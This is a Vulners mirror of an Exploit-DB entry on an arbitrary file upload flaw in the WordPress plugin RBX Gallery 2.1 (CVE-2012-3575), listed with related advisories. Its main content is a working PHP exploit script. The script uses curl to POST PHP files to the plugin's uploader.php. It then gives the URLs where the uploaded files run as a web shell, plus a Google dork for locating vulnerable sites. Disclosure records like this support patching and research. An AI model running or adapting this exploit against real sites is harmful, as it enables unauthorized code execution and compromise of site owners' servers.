Lucene search
+L

WordPress Plugin RBX Gallery 2.1 - Arbitrary File Upload

🗓️ 08 Jun 2012 00:00:00Reported by Sammy FORGITType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

Wordpress Plugin RBX Gallery 2.1 Arbitrary File Uploa

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-3575
8 Jun 201200:00
circl
cve
CVE
CVE-2012-3575
16 Jun 201200:00
cve
cvelist
Cvelist
CVE-2012-3575
16 Jun 201200:00
cvelist
dsquare
Dsquare
WordPress RBX Gallery 2.1 File Upload
25 Jun 201200:00
dsquare
nvd
NVD
CVE-2012-3575
16 Jun 201200:55
nvd
patchstack
Patchstack
WordPress RBX Gallery Plugin 2.1 - Arbitrary File Upload
8 Jun 201200:00
patchstack
prion
Prion
Unrestricted file upload
16 Jun 201200:55
prion
wpvulndb
WPVulnDB
RBX Gallery 2.1 - uploader.php File Upload PHP Code Execution
1 Aug 201410:58
wpvulndb
##################################################
# Description : Wordpress Plugins - RBX Gallery Multiple Arbitrary File
Upload Vulnerability
# Version : 2.1
# Link : http://wordpress.org/extend/plugins/rbxgallery/
# Plugins : http://downloads.wordpress.org/plugin/rbxgallery.2.1.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/rbxgallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$uploadfile2="db.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/rbxgallery/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('images[0]'=>"@$uploadfile",
                'images[1]'=>"@$uploadfile2",
                'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/lo.php
http://www.exemple.com/wordpress/wp-content/uploads/rbxslider/db.php

lo.php
<?php
phpinfo();
?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jun 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 210
EPSS0.15419
45